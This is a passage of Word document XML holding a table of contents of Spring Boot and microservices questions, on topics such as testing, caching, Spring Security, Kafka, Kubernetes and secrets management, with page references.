        <w:p w14:paraId="63E3499B" w14:textId="3BFD520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7867894 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>907</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="218BB7DF" w14:textId="5671E16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7867895 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>910</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0819A375" w14:textId="7EDE4B4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7867896 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>912</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AA070E1" w14:textId="35BAB4D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7867897 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>914</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58175C7A" w14:textId="5145B4C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mock external REST API calls by adding integration test in Spring Boot Application service?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867898 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>916</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13438E03" w14:textId="5F62A96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8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use Test containers to write effective integration test for Spring Boot application interacting with a database?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867899 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>917</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21ABCCD4" w14:textId="0960B40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automate the generation of Open API directly from your Spring boot code using library Spring doc Open API?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867900 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>919</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56DD9C48" w14:textId="6D3412D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the strategy for deprecated API endpoints gracefully?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867901 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>921</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EC16A00" w14:textId="2761DF5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correlate required trace flows which flows across multiple Spring Boot microservices for effective debugging and monitoring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867902 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>923</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D0C2E6F" w14:textId="46BB868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setup custom health check in Spring Boot application for deploying application in containerization tool like Kubernetes?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867903 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>925</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="475E2726" w14:textId="49E9A1C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the distributed caching like Redis in Spring Boot application and manage cache mechanism strategy?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867904 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>928</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0210B9F2" w14:textId="01C8DDD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refactor traditional working Spring MVC Rest service to use Spring WebFlux for handling high concurrency?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867905 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>932</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56BA23EC" w14:textId="4A6BCF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manage back pressure in dealing with Spring Reactive where consumer is slower than a producer?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867906 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>936</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E00F89E" w14:textId="21B7879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manage role-based access control to your API using Spring Security?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867907 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>939</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="464E94BF" w14:textId="7DBCA21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ntegrate Spring Security with an external identity provider like keycloak or okta using OpenId connect, OIDC or OAuth2?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867908 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>942</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FAD4AF0" w14:textId="3EAB19D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mplement asynchronous communication between Spring Boot microservices using message broker like Kafka or RabbitMQ?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867909 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>944</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4620B413" w14:textId="7FD8375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ensure idempotent message consumption while processing messages from queue in Spring Boot microservice?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867910 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>948</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FA92367" w14:textId="31370FF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make sure with Spring Boot application to expose custom application metrics an example compatible with Prometheus?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867911 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>950</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46C012D7" w14:textId="6970E31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handle complex queries efficiently with Spring Data JPA beyond simple CRUD or pagination?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867912 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>953</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="519F95A6" w14:textId="36CC169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efficiently utilised the Spring Boot Actuators in PODs with health metrics in operation and management and modifying your microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867913 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>956</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="723CEF72" w14:textId="4C4DB8D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externalize configuration for microservices specifically for different environments?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867914 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>959</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B8C065E" w14:textId="281F8A7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orchestrate and deploy multiple Spring Boot microservices together in Production environment using Kubernetes?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867915 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>962</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75DD3224" w14:textId="610BB53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the Circuit breaker pattern (example resilience4j / hystrix) in Spring  Boot microservices where application to handle the failures in the downstream systems?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867916 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>966</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41D981CB" w14:textId="57D7729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Saga design patterns with transitions with multiple different Spring Boot Microservices and explain with examples?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867917 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>969</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5055262E" w14:textId="59B707E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implement feature flags or toggles in Spring Boot Microservices to control to roll out of new features?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867918 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>972</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DA69FF4" w14:textId="4E8A79D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you handle secrets management security in Spring Boot application in Production environment example database passwords etc?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867919 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>975</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C534D67" w14:textId="4102CDFF"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920" w:history="1">
            <w:r w:rsidRPr="006E6F1F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Microservices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
